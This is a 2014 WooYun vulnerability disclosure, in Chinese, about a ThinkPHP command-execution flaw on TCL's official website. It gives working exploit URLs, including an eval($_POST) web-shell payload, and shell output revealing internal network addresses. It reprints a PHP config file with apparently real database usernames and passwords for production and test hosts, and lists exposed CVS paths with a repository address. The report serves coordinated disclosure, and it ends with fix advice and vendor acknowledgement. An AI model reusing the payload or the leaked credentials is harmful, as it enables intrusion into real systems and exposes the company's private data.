当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058929

漏洞标题:TCL官网命令执行导致getshell(可内网,附赠信息泄漏一枚)

相关厂商:TCL官方网上商城

漏洞作者: Mody

提交时间:2014-04-30 19:45

修复时间:2014-06-14 19:45

公开时间:2014-06-14 19:45

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-04-30: 厂商已经确认,细节仅向厂商公开
2014-05-10: 细节向核心白帽子及相关领域专家公开
2014-05-20: 细节向普通白帽子公开
2014-05-30: 细节向实习白帽子公开
2014-06-14: 细节向公众公开

简要描述:

如题

详细说明:

1. 主站命令执行
是thinkphp的命令执行漏洞,这么久了还没修复,维护人员该打pp了
http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()}
直接http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D getshell
来张图

1.JPG


内网信息

[/var/www/html/tcl/]$ whoami
apache
[/var/www/html/tcl/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
eth1 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B2
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
eth2 Link encap:Ethernet HWaddr 40:F2:E9:29:38:D2
inet addr:10.4.22.72 Bcast:10.4.255.255 Mask:255.255.0.0
inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0
TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:56145622678 (52.2 GiB) TX bytes:489393736613 (455.7 GiB)
Memory:91580000-915a0000

漏洞证明:

内网敏感信息泄漏
翻下目录,发现了内网好多信息
1. n多数据库账户密码泄漏

<?php
switch($_SERVER["HTTP_HOST"]) {
case "localhost:8080": { //本机
$db_host = "localhost";
$db_name = "tcl";
$db_user = 'root';
$db_pass = 'root';
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.21.23": { //测试
$db_host = "10.4.21.20";
$db_name = "tcl";
$db_user = 'tcladmin';
$db_pass = '123456';
$db_host_en = "10.4.21.20";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.21.24": { //测试2
$db_host = "10.4.21.20";
$db_name = "tcl";
$db_user = 'tcladmin';
$db_pass = '123456';
$db_host_en = "10.4.21.20";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.22.72": { //正式
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';
$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.22.73": { //正式2
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';
$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
default : { //正式
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';
$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";
$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = true;
break;
}
}
?>


2. 附赠子域名站点cvs信息泄漏一枚
http://multimedia.tcl.com/cn/investor/CVS/Root
http://multimedia.tcl.com/CVS/Root
http://multimedia.tcl.com/en/home/CVS/Root

:sspi:mars.ho@source.loko-asia.com:2401/cvsdata


修复方案:

1. 升级
2. 改口令,之前不知道还有人来过没,一定要改
3. 给个高rank呗

版权声明:转载请注明来源 Mody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-30 22:03

厂商回复:

感谢您的关注,已转交相关单位处理。

最新状态:

暂无